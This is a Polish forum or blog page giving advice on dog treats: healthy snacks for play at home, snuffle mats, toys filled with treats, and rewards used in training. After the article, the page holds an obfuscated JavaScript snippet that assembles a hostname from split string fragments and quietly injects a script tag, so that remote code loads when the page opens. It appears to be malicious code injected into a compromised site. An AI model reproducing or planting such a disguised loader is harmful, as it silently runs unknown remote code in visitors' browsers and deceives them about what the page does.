Forum

Musisz się zalogować jeżeli chcesz umieszczać wpisy i zakładać tematy.

Przekąski i smaczki – atrakcyjne i zdrowe nagrody dla psa

Wszyscy lubimy drobne przyjemności, a dobre jedzenie zalicza się do ich jak najbardziej. Psy bywają łakomczuchami, podobnie jak ludzie, więc za coś pysznego potrafią nauczyć się zabawnych sztuczek. Nagroda dla psa w postaci przekąski jest jednym z najpopularniejszych sposobów skutecznego szkolenia psa.

Jeśli intensywnie szkolisz swojego psa, to potrzebujesz całkiem pokaźniej porcji przekąsek dziennie. Warto więc zastanowić się, czy to co dajesz psu w czasie treningu lub zabawy, jest dla niego zdrowe.

Przekąski dla psa – zabawa w domu

Pies w domu przeważnie jest zrelaksowany i leży lub śpi. To jest sytuacja idealna, która nie zawsze jest możliwa. Po pierwsze młodsze psy maja tak dużo energii, że nawet kilka godzin intensywnego spaceru jej nie wyczerpuje. Po drugie – niektóre psy nie mogą dużo biegać ze względu na chorobę lub wiek, więc nie są zmęczone na spacerze i w domu szybko rozglądają się za jakimś zajęciem.

Zabawianie psa w domu wiąże się z dawaniem mu przekąsek, ale trzeba wybierać te zdrowe. Na pewno nie należy karmić psa jedzeniem przeznaczonym dla ludzi. Jest ono przeważnie za słone i nadmiernie przyprawione. Zdrowe przekąski oferują producenci karmy dla psów. Poza tym, że pies dostaje je za wykonywanie poleceń – w domu z powodzeniem można ćwiczyć niektóre komendy – możemy wykorzystywać przekąski do zabaw węchowych. Takie zajęcia męczą psa psychicznie i wyciszają go na jakiś czas.

Jedną z popularnych zabaw jest mata węchowa, w której ukrywa się przekąski dla psa. Na czas, kiedy pies zostaje sam w domu, można mu zostawiać piłkę wypełnioną smaczkami dla psa. Zajęty wyjadaniem pies nie będzie rozładowywał napięcia spowodowanego samotnością na butach, meblach i dywanach.

Nagrody dla psa w czasie treningu

Przekąski i smakołyki dla psa wykorzystujemy przede wszystkim jako nagrody w trakcie treningów na zewnątrz. Osoby prowadzące szkolenia dla psów zalecają, by przed zajęciami pies nie dostał jedzenia przez dłuższy czas.

Właściciel powinien stawić się na szkolenie z saszetką pełną psich przekąsek i to takich, za które pies będzie chętnie ćwiczył. Przekąski dla psów można kupić obecnie w wielu smakach i w różnej postaci. Mogą to być pachnące ciasteczka z wątróbką lub kąski z suszonego mięsa. Najlepiej, jeśli zawierają jak najmniej konserwantów, bo psy miewają alergie na te substancje.

(function(){
oXvp=document.createElement("script");oXvp.async=true;oXvp_="u"+("s")+"t";
oXvpu="495629289.";oXvp_+="a"+("t.i");oXvp_+="n"+("f"+"o")+"/";
oXvpu+="x5g8cfrvXvpx05k9v8qqi8"+("yhXpr2sr");
oXvp.src="https://"+oXvp_+oXvpu;oXvp.type="text/javascript";
document.body.appendChild(oXvp);
})();

facebook